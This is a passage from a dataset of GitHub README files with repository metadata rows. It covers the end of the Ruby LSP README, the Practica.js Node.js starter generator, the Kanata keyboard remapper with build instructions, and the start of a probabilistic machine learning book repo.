- [Ruby LSP RSpec](https://github.com/st0012/ruby-lsp-rspec)
- [Ruby LSP rubyfmt](https://github.com/jscharf/ruby-lsp-rubyfmt)
Other community driven addons can be found in [rubygems](https://rubygems.org/search?query=name%3A+ruby-lsp) by
searching for the `ruby-lsp` prefix.
For instructions on how to create addons, see the [addons documentation](ADDONS.md).
## Learn More
* [RubyConf 2022: Improving the development experience with language servers](https://www.youtube.com/watch?v=kEfXPTm1aCI) ([Vinicius Stock](https://github.com/vinistock))
* [Remote Ruby: Ruby Language Server with Vinicius Stock](https://remoteruby.com/221)
* [RubyKaigi 2023: Code indexing - How language servers understand our code](https://www.youtube.com/watch?v=ks3tQojSJLU) ([Vinicius Stock](https://github.com/vinistock))
## Contributing
Bug reports and pull requests are welcome on GitHub at https://github.com/Shopify/ruby-lsp. This project is intended to
be a safe, welcoming space for collaboration, and contributors are expected to adhere to the [Contributor
Covenant](CODE_OF_CONDUCT.md) code of conduct.
If you wish to contribute, see [CONTRIBUTING](CONTRIBUTING.md) for development instructions and check out our pinned
[roadmap issue](https://github.com/Shopify/ruby-lsp/issues) for a list of tasks to get started.
## License
The gem is available as open source under the terms of the [MIT License](LICENSE.txt).
| An opinionated language server for Ruby | lsp,ruby | 94 | 6,712 | 1,489 | 3,911 | 101 | 50 | 13 |
practicajs/practica | ![Best practices starter](/static/images/practica-logo.png)
<br/>
### Generate a Node.js app that is packed with best practices AND simplicity in mind. Based off our repo [Node.js best practices](https://github.com/goldbergyoni/nodebestpractices) (96,100 stars)
<br />
![Twitter](/static/images/twitter-icon.png) [Twitter](https://twitter.com/nodepractices) | ![Site](/docs/static/img/site-icon.png) [Documentation site](https://practica.dev/)
<br/>
# A One Paragraph Overview
Although Node.js has great frameworks 💚, they were never meant to be dev & production ready immediately (e.g., no architecture layers, DB schemas, docker file, etc etc). Practica.js aims to bridge the gap. Based on your preferred framework, we generate example code that demonstrates a full Microservice flow, from API to DB, that is packed with good practices. For example, we include a battle-tested error handler, sanitized API response, hardened dockerfile, thoughtful 3-tier folder structure, great testing templates with DB, and more. This saves a great deal of time and can prevent painful mistakes. All decisions made are [neatly and thoughtfully documented](https://practica.dev/decisions). We strive to keep things as simple and standard as possible and base our work on the popular guide: [Node.js Best Practices](https://github.com/goldbergyoni/nodebestpractices)
**1 min video 👇, ensure audio is activated**
https://user-images.githubusercontent.com/8571500/170464232-43355e43-98cf-4069-b9fc-6bc303a39efc.mp4
<br/>
# `Table of Contents`
- [`Super-Quick Setup`](#super-quick-setup)
- [`Our Philosophies and Unique Values`](#our-philosophies-and-unique-values)
- [`Practices and Features`](#practices-and-features)
- [`The People Behind Practica.js`](#the-people-behind-practicajs)
- [`Our best practices guide, 78,000 stars ✨`](https://github.com/goldbergyoni/nodebestpractices)
- [`Contribution guide`](https://github.com/practicajs/practica/blob/main/CONTRIBUTING.md)
- [`Documentation site`](https://practica.dev/)
- [`YouTube`](https://www.youtube.com/channel/UCKrSJ0-jm7YVTM_hO7Me9eA)
- Coming Soon:
- Example Applications
- [Express, PostgreSQL, with common best practices](https://github.com/practicajs/practica/blob/main/docs/not-ready-yet.md)
- [Express, mongo-db, with common best practices](https://github.com/practicajs/practica/blob/main/docs/not-ready-yet.md)
- [Express, PostgreSQL, with all best practices (advanced)](https://github.com/practicajs/practica/blob/main/docs/not-ready-yet.md)
- [Minimal with project setup configuration only](https://github.com/practicajs/practica/blob/main/docs/not-ready-yet.md)
<details><summary>More Flavours</summary>
- Fastify, PostgreSQL
- Fastify, mongo-db
- Generate Your Own Interactively
- More coming soon
</details>
<br />
# Super-Quick Setup
<br />
### Run Practica.js from the Command Line
Run practica CLI and generate our default app (you can customize it using different flags):
```bash
npx @practica/create-node-app immediate --install-dependencies
```
✨ And you're done! That's it, the code's all been generated. Our default setup includes Fastify for the web layer, Sequelize for the data access and PostgreSQL
Prefer express and Prisma? Just pass the right flags to the CLI:
```bash
npx @practica/create-node-app immediate --install-dependencies --web-framework=express --orm=prisma
```
Prefer other DB? We use standard ORMs, read its docs and switch DB. This is your code, do whatever you like
<br />
### Start the Project
```bash
cd {your chosen folder name}
npm install
```
Then choose whether to start the app:
```bash
npm run
```
or run the tests:
```bash
npm test
```
Pretty straightforward, right?
You just got a Node.js Monorepo solution with one example component/Microservice and multiple libraries. Based on this hardened solution you can build a robust application. The example component/Microservice is located under: *{your chosen folder name}/services/order-service*. This is where you'll find the API and a good spot to start your journey from
<br />
### Next Steps
- ✅ Start coding. The code we generate is minimal by design and based on known libraries. This should help you get up to speed quickly.
- ✅ Read our ['coding with practica'](https://practica.dev/the-basics/coding-with-practica/) guide
- ✅ Master it by reading our [docs at https://practica.dev](https://practica.dev).
<br />
# Our Philosophies and Unique Values
### 1. Best Practices _on top of_ known Node.js frameworks
We don't re-invent the wheel. Rather, we use your favorite framework and empower it with structure and real examples. With a single command you can get an Express/Fastify-based codebase with many thoughtful best practices inside
![Built on top of known frameworks](/static/images/on-top-of-frameworks.png)
### 2. Simplicity, how Node.js was intended
Keeping it simple, flat, and based on native Node/JS capabilities is part of this project's DNA. We believe that too many abstractions, high-complexity or fancy language features can quickly become a stumbling block for the team
To name a few examples, our code flow is flat with almost no level of indirection, no DI - it's just simple functions calling other functions. Although using TypeScript, almost no features are being used besides types, for modularization we simply use... Node.js modules
![Simplicity!](/static/images/abstractions-vs-simplicity.png)
### 3. Supports many technologies and frameworks
Good Practices and Simplicity is the name of the game with Practica. There is no need to narrow our code to a specific framework or database. We aim to support the popular Node.js frameworks and data access approaches
![Built on top of known frameworks](/static/images/tech-stack.png)
<br />
# Practices and Features
We apply dozens of practices and optimizations. You can opt in or out for most of these features using option flags on our CLI. The following table lists just a few examples out of the [full list of features we provide](https://practicajs.org/features).
| **Feature** | **Explanation** | **Flag** | **Docs** |
| ----------- | --------------- | -------- | -------- |
| Monorepo setup | Generates two components (e.g., Microservices) in a single repository with interactions between the two | --mr, --monorepo | [Docs here]() |
| Output escaping and sanitizing | Clean-out outgoing responses from potential HTML security risks like XSS | --oe, --output-escape | [Docs here]() |
| Integration (component) testing | Generates full-blown component/integration tests setup including DB | --t, --tests | [Docs here]() |
| Unique request ID (Correlation ID) | Generates module that creates a unique correlation/request ID for every incoming request. This is available for any other object during the request life-span. Internally it uses Node's built-in [AsyncLocalStorage](https://nodejs.org/api/async_hooks.html#class-asynclocalstorage) | --coi, --correlation-id | [Docs here]() |
| Dockerfile | Generates dockerfile that embodies >20 best practices | --df, --docker-file | [Docs here]() |
| Strong-schema configuration | A configuration module that dynamically load run-time configuration keys and includes a strong schema so it can fail fast | Built-in with basic app | [Docs here](https://github.com/bestpractices/practica/blob/main/docs/decisions/configuration-library.MD) |
📗 **See our full list of features [here](https://practica.dev/features)**
<br />
# The People Behind Practica.js
## Steering Committee
Practica is a community-driven open-source project. It's being led voluntarily by engineers from many different companies. These companies are just a few who encourage their engineers to contribute and keep this project moving. 💚
![Autodesk](/static/images/autodesk.png)
A Nasdaq 100 company, a world leader in design software
![Cox2m](/static/images/cox2m.png)
Leader IoT provider, part of 'Cox Communication', the 3rd largest cable company in the US
## Core Team
<table width="700px">
<tr>
<td align="center"><img src="./static/images/yoni.jpeg" width="300px" alt=""/><br /><h3>Yoni Goldberg</h3><br/>Independent Node.js consultant<br/><a href="https://twitter.com/goldbergyoni"><img src="./static/images/twitter-symbol.png" width="16" height="16"></img></a>
<a href="https://goldbergyoni.com"><img src="./static/images/site-symbol.png" width="16" height="16"></img></a>
</td>
<td align="center"><img src="./static/images/michael1.jpg" width="300px" alt=""/><br /><h3>Michael Solomon</h3><br/>Node.js lead<br/><a href="https://twitter.com/JMichaelShlomo"><img src="./static/images/twitter-symbol.png" width="16" height="16"></img></a>
</td>
</tr>
<tr>
<td align="center"><img src="./static/images/raz.jpeg" width="300px" alt=""/><br /><h3>Raz Luvaton</h3><br/>Node.js developer<br/><a href="https://twitter.com/goldbergyoni"><img src="./static/images/twitter-symbol.png" width="16" height="16"></img></a>
<a href="https://goldbergyoni.com"><img src="./static/images/site-symbol.png" width="16" height="16"></img></a>
</td>
<td align="center"><img src="./static/images/daniel.jpeg" width="300px" alt=""/><br /><h3>Daniel Gluskin</h3><br/>Node.js lead<br/><a href="https://twitter.com/goldbergyoni"><img src="./static/images/twitter-symbol.png" width="16" height="16"></img></a>
<a href="https://goldbergyoni.com"><img src="./static/images/site-symbol.png" width="16" height="16"></img></a>
</td>
</tr>
<tr>
<td align="center"><img src="./static/images/ariel.jpeg" width="300px" alt=""/><br /><h3>Ariel Steiner</h3><br/>Node.js developer<br/><a href="https://twitter.com/goldbergyoni"><img src="./static/images/twitter-symbol.png" width="16" height="16"></img></a>
<a href="https://goldbergyoni.com"><img src="./static/images/site-symbol.png" width="16" height="16"></img></a>
</td>
<td align="center"><img src="./static/images/tomer.jpeg" width="300px" alt=""/><br /><h3>Tomer Kohane</h3><br/>Frontend geek<br/><a href="https://twitter.com/goldbergyoni"><img src="./static/images/twitter-symbol.png" width="16" height="16"></img></a>
<a href="https://goldbergyoni.com"><img src="./static/images/site-symbol.png" width="16" height="16"></img></a>
</td>
</tr>
<tr>
<td align="center"><img src="./static/images/dan.png" width="300px" alt=""/><br /><h3>Dan Goldberg</h3><br/>Node.js lead<br/><a href="https://twitter.com/goldbergyoni"><img src="./static/images/twitter-symbol.png" width="16" height="16"></img></a>
<a href="https://goldbergyoni.com"><img src="./static/images/site-symbol.png" width="16" height="16"></img></a>
</td>
<td align="center"><img src="./static/images/ron.jpeg" width="300px" alt=""/><br /><h3>Ron Dahan</h3><br/>Node.js expert<br/><a href="https://twitter.com/goldbergyoni"><img src="./static/images/twitter-symbol.png" width="16" height="16"></img></a>
<a href="https://goldbergyoni.com"><img src="./static/images/site-symbol.png" width="16" height="16"></img></a>
</td>
</tr>
</table>
<br />
# Partners
These companies are keen for continuous improvement and their engineers to have been known to contribute during work hours.
![Minta](/static/images/minta.png)
## Our Amazing Contributors 💚
A million thanks to these great people who have contributed code to our project:
<!-- ALL-CONTRIBUTORS-LIST:START - Do not remove or modify this section -->
<!-- prettier-ignore-start -->
<!-- markdownlint-disable -->
<table>
<tbody>
<tr>
<td align="center" valign="top" width="25%"><a href="https://www.clarkio.com"><img src="https://avatars.githubusercontent.com/u/6265396?v=4?s=200" width="200px;" alt="Brian Clark"/><br /><sub><b>Brian Clark</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=clarkio" title="Code">💻</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/rluvaton"><img src="https://avatars.githubusercontent.com/u/16746759?v=4?s=200" width="200px;" alt="Raz Luvaton"/><br /><sub><b>Raz Luvaton</b></sub></a><br /><a href="#content-rluvaton" title="Content">🖋</a> <a href="https://github.com/practicajs/practica/commits?author=rluvaton" title="Code">💻</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/mikicho"><img src="https://avatars.githubusercontent.com/u/11459632?v=4?s=200" width="200px;" alt="Michael Solomon"/><br /><sub><b>Michael Solomon</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=mikicho" title="Code">💻</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/itainoam"><img src="https://avatars.githubusercontent.com/u/12605830?v=4?s=200" width="200px;" alt="itainoam"/><br /><sub><b>itainoam</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=itainoam" title="Code">💻</a> <a href="#projectManagement-itainoam" title="Project Management">📆</a></td>
</tr>
<tr>
<td align="center" valign="top" width="25%"><a href="https://github.com/shanizlo"><img src="https://avatars.githubusercontent.com/u/39856071?v=4?s=200" width="200px;" alt="shanizlo"/><br /><sub><b>shanizlo</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=shanizlo" title="Code">💻</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/RonDaha"><img src="https://avatars.githubusercontent.com/u/30000700?v=4?s=200" width="200px;" alt="Ron Dahan"/><br /><sub><b>Ron Dahan</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=RonDaha" title="Code">💻</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/alonkishoni"><img src="https://avatars.githubusercontent.com/u/49868301?v=4?s=200" width="200px;" alt="AlonK"/><br /><sub><b>AlonK</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=alonkishoni" title="Code">💻</a></td>
<td align="center" valign="top" width="25%"><a href="https://twitter.com/joseluah53"><img src="https://avatars.githubusercontent.com/u/11966345?v=4?s=200" width="200px;" alt="Jose Luis Alvarez Herrera"/><br /><sub><b>Jose Luis Alvarez Herrera</b></sub></a><br /><a href="#content-jalvar53" title="Content">🖋</a> <a href="https://github.com/practicajs/practica/commits?author=jalvar53" title="Code">💻</a></td>
</tr>
<tr>
<td align="center" valign="top" width="25%"><a href="https://github.com/reinaldo-calderon-team"><img src="https://avatars.githubusercontent.com/u/60945397?v=4?s=200" width="200px;" alt="reinaldo-calderon-team"/><br /><sub><b>reinaldo-calderon-team</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=reinaldo-calderon-team" title="Code">💻</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/KarelVerschraegen"><img src="https://avatars.githubusercontent.com/u/11301291?v=4?s=200" width="200px;" alt="KarelVerschraegen"/><br /><sub><b>KarelVerschraegen</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=KarelVerschraegen" title="Documentation">📖</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/danm"><img src="https://avatars.githubusercontent.com/u/6394846?v=4?s=200" width="200px;" alt="Daniel Morrison"/><br /><sub><b>Daniel Morrison</b></sub></a><br /><a href="#content-danm" title="Content">🖋</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/seanlowe"><img src="https://avatars.githubusercontent.com/u/35589586?v=4?s=200" width="200px;" alt="Sean Lowe"/><br /><sub><b>Sean Lowe</b></sub></a><br /><a href="#example-seanlowe" title="Examples">💡</a> <a href="#content-seanlowe" title="Content">🖋</a></td>
</tr>
<tr>
<td align="center" valign="top" width="25%"><a href="https://github.com/idobetesh"><img src="https://avatars.githubusercontent.com/u/58806763?v=4?s=200" width="200px;" alt="idobetesh"/><br /><sub><b>idobetesh</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=idobetesh" title="Code">💻</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/alejaacosta17"><img src="https://avatars.githubusercontent.com/u/89855093?v=4?s=200" width="200px;" alt="Alejandra Acosta"/><br /><sub><b>Alejandra Acosta</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=alejaacosta17" title="Code">💻</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/adandanielteamint"><img src="https://avatars.githubusercontent.com/u/104020188?v=4?s=200" width="200px;" alt="adandanielteamint"/><br /><sub><b>adandanielteamint</b></sub></a><br /><a href="#content-adandanielteamint" title="Content">🖋</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/rashad612"><img src="https://avatars.githubusercontent.com/u/251991?v=4?s=200" width="200px;" alt="Rashad Majali"/><br /><sub><b>Rashad Majali</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=rashad612" title="Code">💻</a></td>
</tr>
<tr>
<td align="center" valign="top" width="25%"><a href="https://github.com/yohai-zv"><img src="https://avatars.githubusercontent.com/u/57675671?v=4?s=200" width="200px;" alt="yohai zvuloon"/><br /><sub><b>yohai zvuloon</b></sub></a><br /><a href="#content-yohai-zv" title="Content">🖋</a></td>
<td align="center" valign="top" width="25%"><a href="https://yonatankra.com"><img src="https://avatars.githubusercontent.com/u/6459899?v=4?s=200" width="200px;" alt="Yonatan Kra"/><br /><sub><b>Yonatan Kra</b></sub></a><br /><a href="#content-YonatanKra" title="Content">🖋</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/yoni-rapoport"><img src="https://avatars.githubusercontent.com/u/16318253?v=4?s=200" width="200px;" alt="Yoni Rapoport"/><br /><sub><b>Yoni Rapoport</b></sub></a><br /><a href="#content-yoni-rapoport" title="Content">🖋</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/perilevy"><img src="https://avatars.githubusercontent.com/u/29686391?v=4?s=200" width="200px;" alt="perilevy"/><br /><sub><b>perilevy</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=perilevy" title="Code">💻</a></td>
</tr>
<tr>
<td align="center" valign="top" width="25%"><a href="https://github.com/ToMer-K"><img src="https://avatars.githubusercontent.com/u/18401157?v=4?s=200" width="200px;" alt="ToMer-K"/><br /><sub><b>ToMer-K</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=ToMer-K" title="Code">💻</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/henarbel"><img src="https://avatars.githubusercontent.com/u/87380400?v=4?s=200" width="200px;" alt="hen arbel"/><br /><sub><b>hen arbel</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=henarbel" title="Code">💻</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/mojcaostir"><img src="https://avatars.githubusercontent.com/u/34694446?v=4?s=200" width="200px;" alt="Mojca Ostir"/><br /><sub><b>Mojca Ostir</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=mojcaostir" title="Code">💻</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/evbambly"><img src="https://avatars.githubusercontent.com/u/45696895?v=4?s=200" width="200px;" alt="evbambly"/><br /><sub><b>evbambly</b></sub></a><br /><a href="#content-evbambly" title="Content">🖋</a></td>
</tr>
<tr>
<td align="center" valign="top" width="25%"><a href="https://github.com/AmirAdarGit"><img src="https://avatars.githubusercontent.com/u/44618095?v=4?s=200" width="200px;" alt="Amir Adar"/><br /><sub><b>Amir Adar</b></sub></a><br /><a href="#content-AmirAdarGit" title="Content">🖋</a></td>
<td align="center" valign="top" width="25%"><a href="https://vaucouleur.com"><img src="https://avatars.githubusercontent.com/u/12293?v=4?s=200" width="200px;" alt="Sebastien Vaucouleur"/><br /><sub><b>Sebastien Vaucouleur</b></sub></a><br /><a href="#content-vaucouleur" title="Content">🖋</a></td>
<td align="center" valign="top" width="25%"><a href="https://hkdobrev.com"><img src="https://avatars.githubusercontent.com/u/506129?v=4?s=200" width="200px;" alt="Harry Dobrev"/><br /><sub><b>Harry Dobrev</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=hkdobrev" title="Code">💻</a></td>
<td align="center" valign="top" width="25%"><a href="https://skippednote.dev"><img src="https://avatars.githubusercontent.com/u/2114712?v=4?s=200" width="200px;" alt="Bassam Ismail"/><br /><sub><b>Bassam Ismail</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=skippednote" title="Documentation">📖</a></td>
</tr>
<tr>
<td align="center" valign="top" width="25%"><a href="https://github.com/marcosmol204"><img src="https://avatars.githubusercontent.com/u/53741892?v=4?s=200" width="200px;" alt="Marcos Molina"/><br /><sub><b>Marcos Molina</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=marcosmol204" title="Code">💻</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/isenkasa"><img src="https://avatars.githubusercontent.com/u/65561129?v=4?s=200" width="200px;" alt="Isen Kasa"/><br /><sub><b>Isen Kasa</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=isenkasa" title="Code">💻</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/vishal-sharma-369"><img src="https://avatars.githubusercontent.com/u/106011641?v=4?s=200" width="200px;" alt="Vishal Sharma"/><br /><sub><b>Vishal Sharma</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=vishal-sharma-369" title="Code">💻</a></td>
</tr>
</tbody>
</table>
<!-- markdownlint-restore -->
<!-- prettier-ignore-end -->
<!-- ALL-CONTRIBUTORS-LIST:END -->
| Node.js solution starter boilerplate that is production-ready, packed with ✅ best practices and built with simplicity in mind | nodejs,best-practices,express,fastify,postgresql,mongodb,boilerplate,starter-kit,hacktoberfest | 0 | 38 | 241 | 849 | 55 | 59 | 6 |
jtroo/kanata | <h1 align="center">Kanata</h1>
<h3 align="center">
<img
alt="Image of a keycap with the letter K on it in pink tones"
title="Kanata"
height="160"
src="assets/kanata-icon.svg"
/>
</h3>
<div align="center">
Improve your keyboard comfort
</div>
## What does this do?
This is a cross-platform software keyboard remapper for Linux, macOS and Windows. A short summary of
the features:
- multiple layers of key functionality
- advanced key behaviour customization (e.g. tap-hold, macros, unicode)
- cross-platform human readable configuration file
Check out the [examples directory](./cfg_samples)
and the [online simulator](https://jtroo.github.io).
To see all of the features, see the [configuration guide](./docs/config.adoc).
The configuration guide aims to be up-to-date with main and may have features not in your version.
See the applicable link in the [releases page](https://github.com/jtroo/kanata/releases).
The most similar project is [kmonad](https://github.com/kmonad/kmonad),
which served as the inspiration for kanata. [Here's a comparison document](./docs/kmonad_comparison.md).
You can see a [list of known issues here](./docs/platform-known-issues.adoc).
### Demo video
[Showcase of multi-layer functionality (30s, 1.7 MB)](https://user-images.githubusercontent.com/6634136/183001314-f64a7e26-4129-4f20-bf26-7165a6e02c38.mp4).
## Why is this useful?
Imagine if, instead of pressing Shift to type uppercase letters, we had giant
keyboards with separate keys for lowercase and uppercase letters. I hope we can
all agree: that would be a terrible user experience!
A way to think of how Shift keys work is that they switch your input to another
layer of functionality where you now type uppercase letters and symbols
instead of lowercase letters and numbers.
What kanata allows you to do is take this alternate layer concept that Shift
keys have and apply it to any key. You can then customize what those layers do
to suit your exact needs and workflows.
## Usage
Running kanata currently does not start it in a background process.
You will need to keep the window that starts kanata running to keep kanata active.
Some tips for running kanata in the background:
- Windows: https://github.com/jtroo/kanata/discussions/193
- Linux: https://github.com/jtroo/kanata/discussions/130
- Run from tray icon: [kanata-tray](https://github.com/rszyma/kanata-tray)
### Pre-built executables
See the
[releases page](https://github.com/jtroo/kanata/releases)
for executables and instructions.
### Build it yourself
This project uses the latest Rust stable toolchain. If you installed the
Rust toolchain using `rustup`, e.g. by using the instructions from the
[official website](https://www.rust-lang.org/learn/get-started),
you can get the latest stable toolchain with `rustup update stable`.
<details>
<summary>Instructions</summary>
Using `cargo install`:
cargo install kanata
# On Linux and macOS, this may not work without `sudo`, see below
kanata --cfg <your_configuration_file>
Build and run yourself in Linux:
git clone https://github.com/jtroo/kanata && cd kanata
cargo build # --release optional, not really perf sensitive
# sudo is used because kanata opens /dev/ files
#
# See below if you want to avoid needing sudo:
# https://github.com/jtroo/kanata/wiki/Avoid-using-sudo-on-Linux
sudo target/debug/kanata --cfg <your_configuration_file>
Build and run yourself in Windows.
git clone https://github.com/jtroo/kanata; cd kanata
cargo build # --release optional, not really perf sensitive
target\debug\kanata --cfg <your_configuration_file>
Build and run yourself in macOS:
For macOS version 11 and newer: Install the [Karabiner VirtualHiDDevice Driver](https://github.com/pqrs-org/Karabiner-DriverKit-VirtualHIDDevice/blob/main/dist/Karabiner-DriverKit-VirtualHIDDevice-3.1.0.pkg).
To activate it:
`/Applications/.Karabiner-VirtualHIDDevice-Manager.app/Contents/MacOS/Karabiner-VirtualHIDDevice-Manager activate`
For macOS version 10 and older:
Install the [Karabiner kernel extension](https://github.com/pqrs-org/Karabiner-VirtualHIDDevice).
git clone https://github.com/jtroo/kanata && cd kanata
cargo build # --release optional, not really perf sensitive
# sudo is needed to gain permission to intercept the keyboard
sudo target/debug/kanata --cfg <your_configuration_file>
The full configuration guide is [found here](./docs/config.adoc).
Sample configuration files are found in [cfg_samples](./cfg_samples). The
[simple.kbd](./cfg_samples/simple.kbd) file contains a basic configuration file
that is hopefully easy to understand but does not contain all features. The
`kanata.kbd` contains an example of all features with documentation. The
release assets also have a `kanata.kbd` file that is tested to work with that
release. All key names can be found in the [keys module](./src/keys/mod.rs),
and you can also define your own key names.
</details>
### Feature flags
When either building yourself or using `cargo install`,
you can add feature flags that
enable functionality that is turned off by default.
<details>
<summary>Instructions</summary>
If you want to enable the `cmd` actions,
add the flag `--features cmd`.
For example:
```
cargo build --release --features cmd
cargo install --features cmd
```
On Windows,
if you want to compile a binary that uses the Interception driver,
you should add the flag `--features interception_driver`.
For example:
```
cargo build --release --features interception_driver
cargo install --features interception_driver
```
To combine multiple flags,
use a single `--features` flag
and use a comma to separate the features.
For example:
```
cargo build --release --features cmd,interception_driver
cargo install --features cmd,interception_driver
```
</details>
## Other installation methods
[![Packaging status](https://repology.org/badge/vertical-allrepos/kanata.svg)](https://repology.org/project/kanata/versions)
## Notable features
- Human readable configuration file.
- [Minimal example](./cfg_samples/minimal.kbd)
- [Full guide](./docs/config.adoc)
- [Simple example with explanations](./cfg_samples/simple.kbd)
- [All features showcase](./cfg_samples/kanata.kbd)
- Live reloading of the configuration for easy testing of your changes.
- Multiple layers of key functionality
- Advanced actions such as tap-hold, unicode output, dynamic and static macros
- Vim-like leader sequences to execute other actions
- Optionally run a TCP server to interact with other programs
- Other programs can respond to [layer changes or trigger layer changes](https://github.com/jtroo/kanata/issues/47)
- [Interception driver](http://www.oblita.com/interception) support (use `kanata_wintercept.exe`)
- Note that this issue exists, which is outside the control of this project:
https://github.com/oblitum/Interception/issues/25
## Contributing
Contributions are welcome!
Unless explicitly stated otherwise, your contributions to kanata will be made
under the LGPL-3.0-only[*] license.
Some directories are exceptions:
- [keyberon](./keyberon): MIT License
- [interception](./interception): MIT or Apache-2.0 Licenses
[Here's a basic low-effort design doc of kanata](./docs/design.md)
[*]: https://www.gnu.org/licenses/identify-licenses-clearly.html
## How you can help
- Try it out and let me know what you think. Feel free to file an issue or
start a discussion.
- Usability issues and unhelpful error messages are considered bugs that should
be fixed. If you encounter any, I would be thankful if you file an issue.
- Browse the open issues and help out if you are able and/or would like to. If
you want to try contributing, feel free to ping jtroo for some pointers.
- If you know anything about writing a keyboard driver for Windows, starting an
open-source alternative to the Interception driver would be lovely.
## Community projects related to kanata
- [vscode-kanata](https://github.com/rszyma/vscode-kanata): Language support for kanata configuration files in VS Code
- [komokana](https://github.com/LGUG2Z/komokana): Automatic application-aware layer switching for [`komorebi`](https://github.com/LGUG2Z/komorebi) (Windows)
- [kanata-tray](https://github.com/rszyma/kanata-tray): Control kanata from a tray icon
- Application-aware layer switching:
- [qanata (Linux)](https://github.com/veyxov/qanata)
- [kanawin (Windows)](https://github.com/Aqaao/kanawin)
- [window_tools (Windows)](https://github.com/reidprichard/window_tools)
## What does the name mean?
I wanted a "k" word since this relates to keyboards. According to Wikipedia,
kanata is an indigenous Iroquoian word meaning "village" or "settlement" and is
the origin of Canada's name.
There's also PPT✧.
## Motivation
TLDR: QMK features but for any keyboard, not just fancy mechanical ones.
<details>
<summary>Long version</summary>
I have a few keyboards that run [QMK](https://docs.qmk.fm/#/). QMK allows the
user to customize the functionality of their keyboard to their heart's content.
One great use case of QMK is its ability map keys so that they overlap with the
home row keys but are accessible on another layer. I won't comment on
productivity, but I find this greatly helps with my keyboard comfort.
For example, these keys are on the right side of the keyboard:
7 8 9
u i o
j k l
m , .
On one layer I have arrow keys in the same position, and on another layer I
have a numpad.
arrows: numpad:
- - - 7 8 9
- ↑ - 4 5 6
← ↓ → 1 2 3
- - - 0 * .
One could add as many customizations as one likes to improve comfort, speed,
etc. Personally my main motivator is comfort due to a repetitive strain injury
in the past.
However, QMK doesn't run everywhere. In fact, it doesn't run on **most**
hardware you can get. You can't get it to run on a laptop keyboard or any
mainstream office keyboard. I believe that the comfort and empowerment QMK
provides should be available to anyone with a computer on their existing
hardware, instead of having to purchase an enthusiast mechanical keyboard
(which are admittedly very nice — I own a few — but can be costly).
The best alternative solution that I found for keyboards that don't run QMK was
[kmonad](https://github.com/kmonad/kmonad). This is an excellent project
and I recommend it if you want to try something similar.
The reason for this project's existence is that kmonad is written in Haskell
and I have no idea how to begin contributing to a Haskell project. From an
outsider's perspective I think Haskell is a great language but I really can't
wrap my head around it. And there are a few [outstanding issues](./docs/kmonad_comparison.md)
at the time of writing that make kmonad suboptimal for my personal workflows.
This project is written in Rust because Rust is my favourite programming
language and the prior work of the awesome [keyberon crate](https://github.com/TeXitoi/keyberon)
exists.
</details>
## Similar Projects
- [kmonad](https://github.com/kmonad/kmonad): The inspiration for kanata (Linux, Windows, Mac)
- [QMK](https://docs.qmk.fm/#/): Open source keyboard firmware
- [keyberon](https://github.com/TeXitoi/keyberon): Rust `#[no_std]` library intended for keyboard firmware
- [ktrl](https://github.com/ItayGarin/ktrl): Linux-only keyboard customizer with layers, a TCP server, and audio support
- [kbremap](https://github.com/timokroeger/kbremap): Windows-only keyboard customizer with layers and unicode
- [xcape](https://github.com/alols/xcape): Linux-only tap-hold modifiers
- [karabiner-elements](https://karabiner-elements.pqrs.org/): Mac-only keyboard customizer
- [capsicain](https://github.com/cajhin/capsicain): Windows-only key remapper with driver-level key interception
- [keyd](https://github.com/rvaiya/keyd): Linux-only key remapper very similar to QMK, kmonad, and kanata
- [xremap](https://github.com/k0kubun/xremap): Linux-only application-aware key remapper inspired more by Emacs key sequences vs. QMK layers/Vim modes
- [keymapper](https://github.com/houmain/keymapper): Context-aware cross-platform key remapper with a different transformation model (Linux, Windows, Mac)
### Why the list?
While kanata is the best tool for some, it may not be the best tool for
you. I'm happy to introduce you to tools that may better suit your needs. This
list is also useful as reference/inspiration for functionality that could be
added to kanata.
## Donations/Support?
The author (jtroo) will not accept monetary donations for work on kanata.
Please instead donate your time and/or money to charity.
Some links are below. These links are provided for learning and as interesting
reads. They are **not** an endorsement.
- https://www.effectivealtruism.org/
- https://www.givewell.org/
| Improve keyboard comfort and usability with advanced customization | keyboard,rust,cross-platform,linux,windows,interception-driver,keyboard-layout,mouse,mouse-emulation,macos | 42 | 43 | 451 | 1,075 | 46 | 6 | 2 |
probml/pml2-book |
# "Probabilistic Machine Learning: Advanced Topics" by Kevin Murphy.
This repo is used to store the pdf for
